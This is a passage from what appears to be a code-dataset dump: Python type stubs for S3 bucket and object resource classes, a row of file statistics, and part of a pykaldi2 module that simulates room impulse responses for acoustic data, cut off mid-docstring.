def ObjectVersion(self, bucket_name: str = None, object_key: str = None, id: str = None) -> 'ObjectVersion':
pass
def create_bucket(self, Bucket: str, ACL: str = None, CreateBucketConfiguration: Dict = None, GrantFullControl: str = None, GrantRead: str = None, GrantReadACP: str = None, GrantWrite: str = None, GrantWriteACP: str = None, ObjectLockEnabledForBucket: bool = None) -> 'Bucket':
pass
def get_available_subresources(self) -> List[str]:
pass
class Bucket(base.ServiceResource):
creation_date: datetime
name: str
multipart_uploads: 'multipart_uploads'
object_versions: 'object_versions'
objects: 'objects'
def copy(self, CopySource: Dict = None, Key: str = None, ExtraArgs: Dict = None, Callback: Callable = None, SourceClient: BaseClient = None, Config: TransferConfig = None):
pass
def create(self, ACL: str = None, CreateBucketConfiguration: Dict = None, GrantFullControl: str = None, GrantRead: str = None, GrantReadACP: str = None, GrantWrite: str = None, GrantWriteACP: str = None, ObjectLockEnabledForBucket: bool = None) -> Dict:
pass
def delete(self):
pass
def delete_objects(self, Delete: Dict, MFA: str = None, RequestPayer: str = None, BypassGovernanceRetention: bool = None) -> Dict:
pass
def download_file(self, Key: str = None, Filename: str = None, ExtraArgs: Dict = None, Callback: Callable = None, Config: TransferConfig = None):
pass
def download_fileobj(self, Fileobj: IO = None, Key: str = None, ExtraArgs: Dict = None, Callback: Callable = None, Config: TransferConfig = None):
pass
def get_available_subresources(self) -> List[str]:
pass
def load(self):
pass
def put_object(self, Key: str, ACL: str = None, Body: Union[bytes, IO] = None, CacheControl: str = None, ContentDisposition: str = None, ContentEncoding: str = None, ContentLanguage: str = None, ContentLength: int = None, ContentMD5: str = None, ContentType: str = None, Expires: datetime = None, GrantFullControl: str = None, GrantRead: str = None, GrantReadACP: str = None, GrantWriteACP: str = None, Metadata: Dict = None, ServerSideEncryption: str = None, StorageClass: str = None, WebsiteRedirectLocation: str = None, SSECustomerAlgorithm: str = None, SSECustomerKey: str = None, SSECustomerKeyMD5: str = None, SSEKMSKeyId: str = None, RequestPayer: str = None, Tagging: str = None, ObjectLockMode: str = None, ObjectLockRetainUntilDate: datetime = None, ObjectLockLegalHoldStatus: str = None) -> 'Object':
pass
def upload_file(self, Filename: str = None, Key: str = None, ExtraArgs: Dict = None, Callback: Callable = None, Config: TransferConfig = None):
pass
def upload_fileobj(self, Fileobj: IO = None, Key: str = None, ExtraArgs: Dict = None, Callback: Callable = None, Config: TransferConfig = None):
pass
def wait_until_exists(self):
pass
def wait_until_not_exists(self):
pass
class BucketAcl(base.ServiceResource):
owner: Dict
grants: List
bucket_name: str
def get_available_subresources(self) -> List[str]:
pass
def load(self):
pass
def put(self, ACL: str = None, AccessControlPolicy: Dict = None, GrantFullControl: str = None, GrantRead: str = None, GrantReadACP: str = None, GrantWrite: str = None, GrantWriteACP: str = None):
pass
def reload(self):
pass
class BucketCors(base.ServiceResource):
cors_rules: List
bucket_name: str
def delete(self):
pass
def get_available_subresources(self) -> List[str]:
pass
def load(self):
pass
def put(self, CORSConfiguration: Dict):
pass
def reload(self):
pass
class BucketLifecycle(base.ServiceResource):
rules: List
bucket_name: str
def delete(self):
pass
def get_available_subresources(self) -> List[str]:
pass
def load(self):
pass
def put(self, LifecycleConfiguration: Dict = None):
pass
def reload(self):
pass
class BucketLifecycleConfiguration(base.ServiceResource):
rules: List
bucket_name: str
def delete(self):
pass
def get_available_subresources(self) -> List[str]:
pass
def load(self):
pass
def put(self, LifecycleConfiguration: Dict = None):
pass
def reload(self):
pass
class BucketLogging(base.ServiceResource):
logging_enabled: Dict
bucket_name: str
def get_available_subresources(self) -> List[str]:
pass
def load(self):
pass
def put(self, BucketLoggingStatus: Dict):
pass
def reload(self):
pass
class BucketNotification(base.ServiceResource):
topic_configurations: List
queue_configurations: List
lambda_function_configurations: List
bucket_name: str
def get_available_subresources(self) -> List[str]:
pass
def load(self):
pass
def put(self, NotificationConfiguration: Dict):
pass
def reload(self):
pass
class BucketPolicy(base.ServiceResource):
policy: str
bucket_name: str
def delete(self):
pass
def get_available_subresources(self) -> List[str]:
pass
def load(self):
pass
def put(self, Policy: str, ConfirmRemoveSelfBucketAccess: bool = None):
pass
def reload(self):
pass
class BucketRequestPayment(base.ServiceResource):
payer: str
bucket_name: str
def get_available_subresources(self) -> List[str]:
pass
def load(self):
pass
def put(self, RequestPaymentConfiguration: Dict):
pass
def reload(self):
pass
class BucketTagging(base.ServiceResource):
tag_set: List
bucket_name: str
def delete(self):
pass
def get_available_subresources(self) -> List[str]:
pass
def load(self):
pass
def put(self, Tagging: Dict):
pass
def reload(self):
pass
class BucketVersioning(base.ServiceResource):
status: str
mfa_delete: str
bucket_name: str
def enable(self, MFA: str = None):
pass
def get_available_subresources(self) -> List[str]:
pass
def load(self):
pass
def put(self, VersioningConfiguration: Dict, MFA: str = None):
pass
def reload(self):
pass
def suspend(self, MFA: str = None):
pass
class BucketWebsite(base.ServiceResource):
redirect_all_requests_to: Dict
index_document: Dict
error_document: Dict
routing_rules: List
bucket_name: str
def delete(self):
pass
def get_available_subresources(self) -> List[str]:
pass
def load(self):
pass
def put(self, WebsiteConfiguration: Dict):
pass
def reload(self):
pass
class MultipartUpload(base.ServiceResource):
upload_id: str
key: str
initiated: datetime
storage_class: str
owner: Dict
initiator: Dict
bucket_name: str
object_key: str
id: str
parts: 'parts'
def abort(self, RequestPayer: str = None) -> Dict:
pass
def complete(self, MultipartUpload: Dict = None, RequestPayer: str = None) -> 'Object':
pass
def get_available_subresources(self) -> List[str]:
pass
class MultipartUploadPart(base.ServiceResource):
last_modified: datetime
e_tag: str
size: int
bucket_name: str
object_key: str
multipart_upload_id: str
part_number: str
def copy_from(self, CopySource: Union[str, Dict], CopySourceIfMatch: str = None, CopySourceIfModifiedSince: datetime = None, CopySourceIfNoneMatch: str = None, CopySourceIfUnmodifiedSince: datetime = None, CopySourceRange: str = None, SSECustomerAlgorithm: str = None, SSECustomerKey: str = None, SSECustomerKeyMD5: str = None, CopySourceSSECustomerAlgorithm: str = None, CopySourceSSECustomerKey: str = None, CopySourceSSECustomerKeyMD5: str = None, RequestPayer: str = None) -> Dict:
pass
def get_available_subresources(self) -> List[str]:
pass
def upload(self, Body: Union[bytes, IO] = None, ContentLength: int = None, ContentMD5: str = None, SSECustomerAlgorithm: str = None, SSECustomerKey: str = None, SSECustomerKeyMD5: str = None, RequestPayer: str = None) -> Dict:
pass
class Object(base.ServiceResource):
delete_marker: bool
accept_ranges: str
expiration: str
restore: str
last_modified: datetime
content_length: int
e_tag: str
missing_meta: int
version_id: str
cache_control: str
content_disposition: str
content_encoding: str
content_language: str
content_type: str
expires: datetime
website_redirect_location: str
server_side_encryption: str
metadata: Dict
sse_customer_algorithm: str
sse_customer_key_md5: str
ssekms_key_id: str
storage_class: str
request_charged: str
replication_status: str
parts_count: int
object_lock_mode: str
object_lock_retain_until_date: datetime
object_lock_legal_hold_status: str
bucket_name: str
key: str
def copy(self, CopySource: Dict = None, ExtraArgs: Dict = None, Callback: Callable = None, SourceClient: BaseClient = None, Config: TransferConfig = None):
pass
def copy_from(self, CopySource: Union[str, Dict], ACL: str = None, CacheControl: str = None, ContentDisposition: str = None, ContentEncoding: str = None, ContentLanguage: str = None, ContentType: str = None, CopySourceIfMatch: str = None, CopySourceIfModifiedSince: datetime = None, CopySourceIfNoneMatch: str = None, CopySourceIfUnmodifiedSince: datetime = None, Expires: datetime = None, GrantFullControl: str = None, GrantRead: str = None, GrantReadACP: str = None, GrantWriteACP: str = None, Metadata: Dict = None, MetadataDirective: str = None, TaggingDirective: str = None, ServerSideEncryption: str = None, StorageClass: str = None, WebsiteRedirectLocation: str = None, SSECustomerAlgorithm: str = None, SSECustomerKey: str = None, SSECustomerKeyMD5: str = None, SSEKMSKeyId: str = None, CopySourceSSECustomerAlgorithm: str = None, CopySourceSSECustomerKey: str = None, CopySourceSSECustomerKeyMD5: str = None, RequestPayer: str = None, Tagging: str = None, ObjectLockMode: str = None, ObjectLockRetainUntilDate: datetime = None, ObjectLockLegalHoldStatus: str = None) -> Dict:
pass
def delete(self, MFA: str = None, VersionId: str = None, RequestPayer: str = None, BypassGovernanceRetention: bool = None) -> Dict:
pass
def download_file(self, Filename: str = None, ExtraArgs: Dict = None, Callback: Callable = None, Config: TransferConfig = None):
pass
def download_fileobj(self, Fileobj: IO = None, ExtraArgs: Dict = None, Callback: Callable = None, Config: TransferConfig = None):
pass
def get(self, IfMatch: str = None, IfModifiedSince: datetime = None, IfNoneMatch: str = None, IfUnmodifiedSince: datetime = None, Range: str = None, ResponseCacheControl: str = None, ResponseContentDisposition: str = None, ResponseContentEncoding: str = None, ResponseContentLanguage: str = None, ResponseContentType: str = None, ResponseExpires: datetime = None, VersionId: str = None, SSECustomerAlgorithm: str = None, SSECustomerKey: str = None, SSECustomerKeyMD5: str = None, RequestPayer: str = None, PartNumber: int = None) -> Dict:
pass
def get_available_subresources(self) -> List[str]:
pass
def initiate_multipart_upload(self, ACL: str = None, CacheControl: str = None, ContentDisposition: str = None, ContentEncoding: str = None, ContentLanguage: str = None, ContentType: str = None, Expires: datetime = None, GrantFullControl: str = None, GrantRead: str = None, GrantReadACP: str = None, GrantWriteACP: str = None, Metadata: Dict = None, ServerSideEncryption: str = None, StorageClass: str = None, WebsiteRedirectLocation: str = None, SSECustomerAlgorithm: str = None, SSECustomerKey: str = None, SSECustomerKeyMD5: str = None, SSEKMSKeyId: str = None, RequestPayer: str = None, Tagging: str = None, ObjectLockMode: str = None, ObjectLockRetainUntilDate: datetime = None, ObjectLockLegalHoldStatus: str = None) -> 'MultipartUpload':
pass
def load(self):
pass
def put(self, ACL: str = None, Body: Union[bytes, IO] = None, CacheControl: str = None, ContentDisposition: str = None, ContentEncoding: str = None, ContentLanguage: str = None, ContentLength: int = None, ContentMD5: str = None, ContentType: str = None, Expires: datetime = None, GrantFullControl: str = None, GrantRead: str = None, GrantReadACP: str = None, GrantWriteACP: str = None, Metadata: Dict = None, ServerSideEncryption: str = None, StorageClass: str = None, WebsiteRedirectLocation: str = None, SSECustomerAlgorithm: str = None, SSECustomerKey: str = None, SSECustomerKeyMD5: str = None, SSEKMSKeyId: str = None, RequestPayer: str = None, Tagging: str = None, ObjectLockMode: str = None, ObjectLockRetainUntilDate: datetime = None, ObjectLockLegalHoldStatus: str = None) -> Dict:
pass
def reload(self):
pass
def restore_object(self, VersionId: str = None, RestoreRequest: Dict = None, RequestPayer: str = None) -> Dict:
pass
def upload_file(self, Filename: str = None, ExtraArgs: Dict = None, Callback: Callable = None, Config: TransferConfig = None):
pass
def upload_fileobj(self, Fileobj: IO = None, ExtraArgs: Dict = None, Callback: Callable = None, Config: TransferConfig = None):
pass
def wait_until_exists(self, IfMatch: str = None, IfModifiedSince: datetime = None, IfNoneMatch: str = None, IfUnmodifiedSince: datetime = None, Range: str = None, VersionId: str = None, SSECustomerAlgorithm: str = None, SSECustomerKey: str = None, SSECustomerKeyMD5: str = None, RequestPayer: str = None, PartNumber: int = None):
pass
def wait_until_not_exists(self, IfMatch: str = None, IfModifiedSince: datetime = None, IfNoneMatch: str = None, IfUnmodifiedSince: datetime = None, Range: str = None, VersionId: str = None, SSECustomerAlgorithm: str = None, SSECustomerKey: str = None, SSECustomerKeyMD5: str = None, RequestPayer: str = None, PartNumber: int = None):
pass
class ObjectAcl(base.ServiceResource):
owner: Dict
grants: List
request_charged: str
bucket_name: str
object_key: str
def get_available_subresources(self) -> List[str]:
pass
def load(self):
pass
def put(self, ACL: str = None, AccessControlPolicy: Dict = None, GrantFullControl: str = None, GrantRead: str = None, GrantReadACP: str = None, GrantWrite: str = None, GrantWriteACP: str = None, RequestPayer: str = None, VersionId: str = None) -> Dict:
pass
def reload(self):
pass
class ObjectSummary(base.ServiceResource):
last_modified: datetime
e_tag: str
size: int
storage_class: str
owner: Dict
bucket_name: str
key: str
def copy_from(self, CopySource: Union[str, Dict], ACL: str = None, CacheControl: str = None, ContentDisposition: str = None, ContentEncoding: str = None, ContentLanguage: str = None, ContentType: str = None, CopySourceIfMatch: str = None, CopySourceIfModifiedSince: datetime = None, CopySourceIfNoneMatch: str = None, CopySourceIfUnmodifiedSince: datetime = None, Expires: datetime = None, GrantFullControl: str = None, GrantRead: str = None, GrantReadACP: str = None, GrantWriteACP: str = None, Metadata: Dict = None, MetadataDirective: str = None, TaggingDirective: str = None, ServerSideEncryption: str = None, StorageClass: str = None, WebsiteRedirectLocation: str = None, SSECustomerAlgorithm: str = None, SSECustomerKey: str = None, SSECustomerKeyMD5: str = None, SSEKMSKeyId: str = None, CopySourceSSECustomerAlgorithm: str = None, CopySourceSSECustomerKey: str = None, CopySourceSSECustomerKeyMD5: str = None, RequestPayer: str = None, Tagging: str = None, ObjectLockMode: str = None, ObjectLockRetainUntilDate: datetime = None, ObjectLockLegalHoldStatus: str = None) -> Dict:
pass
def delete(self, MFA: str = None, VersionId: str = None, RequestPayer: str = None, BypassGovernanceRetention: bool = None) -> Dict:
pass
def get(self, IfMatch: str = None, IfModifiedSince: datetime = None, IfNoneMatch: str = None, IfUnmodifiedSince: datetime = None, Range: str = None, ResponseCacheControl: str = None, ResponseContentDisposition: str = None, ResponseContentEncoding: str = None, ResponseContentLanguage: str = None, ResponseContentType: str = None, ResponseExpires: datetime = None, VersionId: str = None, SSECustomerAlgorithm: str = None, SSECustomerKey: str = None, SSECustomerKeyMD5: str = None, RequestPayer: str = None, PartNumber: int = None) -> Dict:
pass
def get_available_subresources(self) -> List[str]:
pass
def initiate_multipart_upload(self, ACL: str = None, CacheControl: str = None, ContentDisposition: str = None, ContentEncoding: str = None, ContentLanguage: str = None, ContentType: str = None, Expires: datetime = None, GrantFullControl: str = None, GrantRead: str = None, GrantReadACP: str = None, GrantWriteACP: str = None, Metadata: Dict = None, ServerSideEncryption: str = None, StorageClass: str = None, WebsiteRedirectLocation: str = None, SSECustomerAlgorithm: str = None, SSECustomerKey: str = None, SSECustomerKeyMD5: str = None, SSEKMSKeyId: str = None, RequestPayer: str = None, Tagging: str = None, ObjectLockMode: str = None, ObjectLockRetainUntilDate: datetime = None, ObjectLockLegalHoldStatus: str = None) -> 'MultipartUpload':
pass
def load(self):
pass
def put(self, ACL: str = None, Body: Union[bytes, IO] = None, CacheControl: str = None, ContentDisposition: str = None, ContentEncoding: str = None, ContentLanguage: str = None, ContentLength: int = None, ContentMD5: str = None, ContentType: str = None, Expires: datetime = None, GrantFullControl: str = None, GrantRead: str = None, GrantReadACP: str = None, GrantWriteACP: str = None, Metadata: Dict = None, ServerSideEncryption: str = None, StorageClass: str = None, WebsiteRedirectLocation: str = None, SSECustomerAlgorithm: str = None, SSECustomerKey: str = None, SSECustomerKeyMD5: str = None, SSEKMSKeyId: str = None, RequestPayer: str = None, Tagging: str = None, ObjectLockMode: str = None, ObjectLockRetainUntilDate: datetime = None, ObjectLockLegalHoldStatus: str = None) -> Dict:
pass
def restore_object(self, VersionId: str = None, RestoreRequest: Dict = None, RequestPayer: str = None) -> Dict:
pass
def wait_until_exists(self, IfMatch: str = None, IfModifiedSince: datetime = None, IfNoneMatch: str = None, IfUnmodifiedSince: datetime = None, Range: str = None, VersionId: str = None, SSECustomerAlgorithm: str = None, SSECustomerKey: str = None, SSECustomerKeyMD5: str = None, RequestPayer: str = None, PartNumber: int = None):
pass
def wait_until_not_exists(self, IfMatch: str = None, IfModifiedSince: datetime = None, IfNoneMatch: str = None, IfUnmodifiedSince: datetime = None, Range: str = None, VersionId: str = None, SSECustomerAlgorithm: str = None, SSECustomerKey: str = None, SSECustomerKeyMD5: str = None, RequestPayer: str = None, PartNumber: int = None):
pass
class ObjectVersion(base.ServiceResource):
e_tag: str
size: int
storage_class: str
key: str
version_id: str
is_latest: bool
last_modified: datetime
owner: Dict
bucket_name: str
object_key: str
id: str
def delete(self, MFA: str = None, RequestPayer: str = None, BypassGovernanceRetention: bool = None) -> Dict:
pass
def get(self, IfMatch: str = None, IfModifiedSince: datetime = None, IfNoneMatch: str = None, IfUnmodifiedSince: datetime = None, Range: str = None, ResponseCacheControl: str = None, ResponseContentDisposition: str = None, ResponseContentEncoding: str = None, ResponseContentLanguage: str = None, ResponseContentType: str = None, ResponseExpires: datetime = None, SSECustomerAlgorithm: str = None, SSECustomerKey: str = None, SSECustomerKeyMD5: str = None, RequestPayer: str = None, PartNumber: int = None) -> Dict:
pass
def get_available_subresources(self) -> List[str]:
pass
def head(self, IfMatch: str = None, IfModifiedSince: datetime = None, IfNoneMatch: str = None, IfUnmodifiedSince: datetime = None, Range: str = None, SSECustomerAlgorithm: str = None, SSECustomerKey: str = None, SSECustomerKeyMD5: str = None, RequestPayer: str = None, PartNumber: int = None) -> Dict:
pass
class buckets(ResourceCollection):
@classmethod
def all(cls) -> List['Bucket']:
pass
@classmethod
def filter(cls) -> List['Bucket']:
pass
@classmethod
def iterator(cls) -> ResourceCollection:
pass
@classmethod
def limit(cls) -> List['Bucket']:
pass
@classmethod
def page_size(cls) -> List['Bucket']:
pass
@classmethod
def pages(cls) -> List[base.ServiceResource]:
pass
| 40.010327 | 1,088 | 0.692807 | 2,556 | 23,246 | 6.226135 | 0.090376 | 0.148674 | 0.027774 | 0.036132 | 0.815257 | 0.78698 | 0.764798 | 0.740794 | 0.729106 | 0.717481 | 0 | 0.00158 | 0.210531 | 23,246 | 580 | 1,089 | 40.07931 | 0.865573 | 0 | 0 | 0.653465 | 0 | 0 | 0.01596 | 0.001205 | 0 | 0 | 0 | 0 | 0 | 1 | 0.324257 | false | 0.334158 | 0.027228 | 0 | 0.660891 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 10 |
6d8e4c0cbacab3919d6dd6d644dc9752e9d72e3c | 19,179 | py | Python | simulation/_rirgen.py | gaochangfeng/pykaldi2 | 5e988e5968aa9a5867f8179e6c53ea715ac46bdc | [
"MIT"
] | 179 | 2019-07-11T04:29:17.000Z | 2022-02-26T08:11:09.000Z | simulation/_rirgen.py | gaochangfeng/pykaldi2 | 5e988e5968aa9a5867f8179e6c53ea715ac46bdc | [
"MIT"
] | 15 | 2019-07-26T04:59:36.000Z | 2021-12-08T05:25:06.000Z | simulation/_rirgen.py | gaochangfeng/pykaldi2 | 5e988e5968aa9a5867f8179e6c53ea715ac46bdc | [
"MIT"
] | 31 | 2019-07-11T04:29:24.000Z | 2021-07-22T01:38:22.000Z | import numpy as np
# import cupy
def t60_to_alpha(room, t60):
V = np.prod(room)
c = 343
S = 2 * (room[0] * room[2] + room[1] * room[2] + room[0] * room[1])
alpha = 24 * V * np.log(10) / (c * S * t60)
return alpha
def min_t60_of_room(room):
V = np.prod(room)
c = 343
S = 2 * (room[0] * room[2] + room[1] * room[2] + room[0] * room[1])
min_t60 = 24 * V * np.log(10) / (c * S)
return min_t60 * 1.1
def xp_rirgen(room, source_loc, mic_loc, c=340, fs=16000, t60=0.5,
beta=None, nsamples=None, htw=None, hpfilt=True, habets_compat=False, method=1):
"""Generates room impulse responses corresponding to each source-microphone pair placed in a room.
Args:
room (numpy/cupy array) = room dimensions in meters, shape: (3, 1)
source_loc (numpy/cupy array) = source locations in meters, shape: (3, nsrc)
mic_loc (numpy/cupy array) = microphone locations in meters, shape: (3, nmic)
kwargs:
c (float) = speed of sound in meters/second (default: 340)
fs (float) = sampling rate in Hz (default: 16000)
t60 (float) = t60 or rt60 in seconds or None to use beta parameters (default: 0.5)
beta (numpy/cupy array) = beta parameters of reflections for each side, shape (6,1) (default: None)
nsamples (int) = number of output samples (default: auto from t60)
htw (int) = half size in samples of the time window used for sinc function interpolation (default automatic)
hpfilt (bool) = use post-generation highpass filter or not (default True)
method (int) = 1 or 2, 2 is not tested thoroughly and is very slow, so use 1 always (default 1)
Returns:
room impulse responses in time-domain of shape (nsrc, nmic, nsamples)
Notes:
1. If input arrays are cupy arrays (on GPU), the code runs with cupy, otherwise with numpy
2. if you do not want to install cupy or not interested in GPU processing,
remove line "import cupy" and replace "xp=cupy.get..." with "xp=np"
.. seealso:: :func:`pyrirgen.RirGenerator`
.. seealso:: :url:https://github.com/ehabets/RIR-Generator/blob/master/rir_generator.cpp
>>> ### DOCTEST ###
>>> room = np.array([4,7,3]).reshape(3,1)
>>> source_loc = np.random.uniform(0,1,(3,2)) * room
>>> mic_loc = np.random.uniform(0,1,(3,4)) * room
>>> t60=0.3
>>> rirs_np = xp_rirgen(room, source_loc, mic_loc, t60=t60)
>>> #import matplotlib.pyplot as plt
>>> #plt.plot(rirs_np[0,0,:] , label='rir for src1 and mic1')
>>> croom = cupy.array(room)
>>> csource_loc = cupy.array(source_loc)
>>> cmic_loc = cupy.array(mic_loc)
>>> rirs_cp = xp_rirgen(croom, csource_loc, cmic_loc, t60=t60)
>>> cupy.testing.assert_allclose(rirs_np, cupy.asnumpy(rirs_cp), atol=1e-5, rtol=1e-5)
>>> beta = np.random.uniform(0.1, 0.9, size=6)
>>> rirs_np = xp_rirgen(room, source_loc, mic_loc, beta=beta, t60=None)
>>> cbeta = cupy.array(beta)
>>> rirs_cp = xp_rirgen(croom, csource_loc, cmic_loc, beta=cbeta, t60=None)
>>> cupy.testing.assert_allclose(rirs_np, cupy.asnumpy(rirs_cp), atol=1e-5, rtol=1e-5)
>>> rirs_np = xp_rirgen(room, source_loc, mic_loc, t60=t60, habets_compat=True)
"""
# xp = cupy.get_array_module(room, source_loc, mic_loc, beta)
xp=np
if beta is None and t60 is None:
raise Exception('Either t60 or beta array must be provided')
elif beta is None:
V = xp.prod(room)
S = 2 * (room[0] * room[2] + room[1] * room[2] + room[0] * room[1])
alpha = 24 * V * xp.log(10) / (c * S * t60)
if alpha < 1:
beta = xp.ones(6, ) * xp.sqrt(1 - alpha)
else:
raise Exception('t60 value {} too small for the room'.format(t60))
else:
if xp.max(beta) >= 1.0 or xp.min(beta) <= 0.0:
raise Exception('beta array values should be in the interval (0,1).')
if t60 is not None:
print('Overwriting provided t60 value using provided beta array')
alpha = 1 - beta**2
V = xp.prod(room)
Se = 2 * (room[1] * room[2] * (alpha[0] + alpha[1]) + room[0] * room[2] * (alpha[2] + alpha[3]) + room[0] * room[1] * (alpha[4] + alpha[5]))
t60 = 24 * xp.log(10.0) * V / (c * Se);
if htw is None:
htw = np.minimum(32, int(xp.min(room) / 10 / c * fs))
if habets_compat:
htw = 64
tw_idx = xp.arange(0, 2 * htw).reshape(2 * htw, 1)
try:
assert(xp.all(room.T - mic_loc.T > 0) and xp.all(room.T - source_loc.T > 0))
assert(xp.all(mic_loc.T > 0) and xp.all(source_loc.T > 0))
except:
raise Exception('Room dimensions and source and mic locations are not compatible.')
cTs = c / fs
# convert distances in meters to time-delays in samples
room = room / cTs
mic_loc = mic_loc / cTs
src_loc = source_loc / cTs
nmic = mic_loc.shape[-1]
nsrc = source_loc.shape[-1]
if nsamples is None:
nsamples = int(fs * t60)
def get_reflection_candidates():
nxrefl = int(nsamples / (room[0]))
nyrefl = int(nsamples / (room[1]))
nzrefl = int(nsamples / (room[2]))
xro = xp.arange(-nxrefl, nxrefl + 1)
yro = xp.arange(-nyrefl, nyrefl + 1)
zro = xp.arange(-nzrefl, nzrefl + 1)
xr = xro.reshape(2 * nxrefl + 1, 1, 1)
yr = yro.reshape(1, 2 * nyrefl + 1, 1)
zr = zro.reshape(1, 1, 2 * nzrefl + 1)
RoughDelays = xp.sqrt((2 * xr * room[0]) ** 2 + (2 * yr * room[1]) ** 2 + (2 * zr * room[2]) ** 2)
RoughGains = (beta[0] * beta[1]) ** xp.abs(xr) * (beta[2] * beta[3]) ** xp.abs(yr) * (beta[4] * beta[5]) ** xp.abs(zr) / (
RoughDelays + 0.5 / c * fs) # assume src-mic distance at least .5 metres
maxgain = xp.max(RoughGains)
vreflidx = xp.vstack(xp.nonzero(xp.logical_and(RoughDelays < nsamples, RoughGains > maxgain / 1.0e4)))
nrefl = vreflidx.shape[-1]
reflidx = xp.arange(nrefl).reshape(1, 1, nrefl, 1, 1, 1)
xrefl = xro[vreflidx[..., reflidx][0]]
yrefl = yro[vreflidx[..., reflidx][1]]
zrefl = zro[vreflidx[..., reflidx][2]]
return xrefl, yrefl, zrefl
xrefl, yrefl, zrefl = get_reflection_candidates()
def get_delays_and_gains():
xside = xp.arange(0, 2).reshape(1, 1, 1, 2, 1, 1)
yside = xp.arange(0, 2).reshape(1, 1, 1, 1, 2, 1)
zside = xp.arange(0, 2).reshape(1, 1, 1, 1, 1, 2)
imic = xp.arange(nmic).reshape(1, nmic, 1, 1, 1, 1)
isrc = xp.arange(nsrc).reshape(nsrc, 1, 1, 1, 1, 1)
Delays = xp.sqrt((2 * xrefl * room[0] - mic_loc[0, imic] + (1 - 2 * xside) * src_loc[0, isrc]) ** 2 + (2 * yrefl * room[1] - mic_loc[1, imic] + (1 - 2 * yside) * src_loc[1, isrc]) ** 2 + (2 * zrefl * room[2] - mic_loc[2, imic] + (1 - 2 * zside) * src_loc[2, isrc]) ** 2)
Refl_x = beta[0] ** (xp.abs(xrefl - xside)) * beta[1] ** (xp.abs(xrefl))
Refl_y = beta[2] ** (xp.abs(yrefl - yside)) * beta[3] ** (xp.abs(yrefl))
Refl_z = beta[4] ** (xp.abs(zrefl - zside)) * beta[5] ** (xp.abs(zrefl))
Gains = Refl_x * Refl_y * Refl_z / (4 * np.pi * Delays * cTs)
# Gains[Delays > nsamples] = 0.0
return Delays, Gains
Delays, Gains = get_delays_and_gains()
rirs = xp.zeros((nsrc, nmic, nsamples), dtype=np.float32)
for src in xp.arange(nsrc):
for mic in xp.arange(nmic):
dnow = Delays[src, mic, ...].flatten()
gnow = Gains[src, mic, ...].flatten()
if method == 1:
gnow = gnow[dnow < nsamples - htw - 2]
dnow = dnow[dnow < nsamples - htw - 2]
dnow_floor = xp.floor(dnow)
dnow_dist = dnow - dnow_floor
dnow_floor = dnow_floor.reshape(1, dnow.shape[0])
dnow_dist = dnow_dist.reshape(1, dnow.shape[0])
gnow = gnow.reshape(1, dnow.shape[0])
dnow_ext = dnow_floor + tw_idx - htw + 1
garg = np.pi * (-dnow_dist + 1 + tw_idx - htw)
gnow_ext = gnow * 0.5 * (1.0 - xp.cos(np.pi + garg / htw)) * xp.where(garg == 0.0, 1.0, xp.sin(garg) / garg)
dnow = dnow_ext.flatten().astype(np.int32)
gnow = gnow_ext.flatten().astype(np.float32)
dvalid = xp.logical_and(dnow >= 0, dnow < nsamples)
gnow = gnow[dvalid]
dnow = dnow[dvalid]
rirnow = xp.zeros((nsamples,), dtype=np.float32)
if xp == np:
np.add.at(rirnow, dnow, gnow)
else:
xp.scatter_add(rirnow, dnow, gnow)
rirs[src, mic, ...] = rirnow
elif method == 2: ## this is too slow and may not be accurate as well
gnow = gnow[dnow < nsamples]
dnow = dnow[dnow < nsamples]
frange = xp.arange(0, 0.5 + 0.5 / nsamples, 1.0 / nsamples)
rirfft = xp.zeros(frange.shape, dtype=np.complex128)
for i in range(len(frange)):
rirfft[i] = xp.sum(gnow * xp.exp(-1j * 2 * np.pi * frange[i] * dnow))
rirs[src, mic, :] = xp.real(xp.fft.irfft(rirfft)).astype(dtype=np.float32)
if habets_compat:
if xp is np:
import scipy.signal
W = 2*np.pi*100/fs
R1 = np.exp(-W)
B1 = 2*R1*np.cos(W)
B2 = -R1 * R1
A1 = -(1+R1)
a = np.array([1, -B1, -B2])
b = np.array([1, A1, R1])
rirs = scipy.signal.lfilter(b, a, rirs, axis=-1)
else:
raise Exception('habets_compat not available for cupy')
elif hpfilt:
rirs[:, :, 1:-1] += -0.5 * rirs[:, :, 2:] -0.5 * rirs[:, : , :-2]
return rirs
def xp_rirgen2(room, source_loc, mic_loc, c=340, fs=16000, t60=0.5,
beta=None, nsamples=None, htw=None, hpfilt=True, method=1):
"""Generates room impulse responses corresponding to each source-microphone pair placed in a room.
Args:
room (numpy/cupy array) = room dimensions in meters, shape: (3, 1)
source_loc (numpy/cupy array) = source locations in meters, shape: (3, nsrc)
mic_loc (numpy/cupy array) = microphone locations in meters, shape: (3, nmic)
kwargs:
c (float) = speed of sound in meters/second (default: 340)
fs (float) = sampling rate in Hz (default: 16000)
t60 (float) = t60 or rt60 in seconds or None to use beta parameters (default: 0.5)
beta (numpy/cupy array) = beta parameters of reflections for each side, shape (6,1) (default: None)
nsamples (int) = number of output samples (default: auto from t60)
htw (int) = half size in samples of the time window used for sinc function interpolation (default automatic)
hpfilt (bool) = use post-generation highpass filter or not (default True)
method (int) = 1 or 2, 2 is not tested thoroughly and is very slow, so use 1 always (default 1)
Returns:
room impulse responses in time-domain of shape (nsrc, nmic, nsamples)
Notes:
1. If input arrays are cupy arrays (on GPU), the code runs with cupy, otherwise with numpy
2. if you do not want to install cupy or not interested in GPU processing,
remove line "import cupy" and replace "xp=cupy.get..." with "xp=np"
.. seealso:: :func:`pyrirgen.RirGenerator`
.. seealso:: :url:https://github.com/ehabets/RIR-Generator/blob/master/rir_generator.cpp
>>> ### DOCTEST ###
>>> room = np.array([4,7,3]).reshape(3,1)
>>> source_loc = np.random.uniform(0,1,(3,2)) * room
>>> mic_loc = np.random.uniform(0,1,(3,4)) * room
>>> t60=0.3
>>> rirs_np = xp_rirgen(room, source_loc, mic_loc, t60=t60)
>>> #import matplotlib.pyplot as plt
>>> #plt.plot(rirs_np[0,0,:] , label='rir for src1 and mic1')
>>> croom = cupy.array(room)
>>> csource_loc = cupy.array(source_loc)
>>> cmic_loc = cupy.array(mic_loc)
>>> rirs_cp = xp_rirgen(croom, csource_loc, cmic_loc, t60=t60)
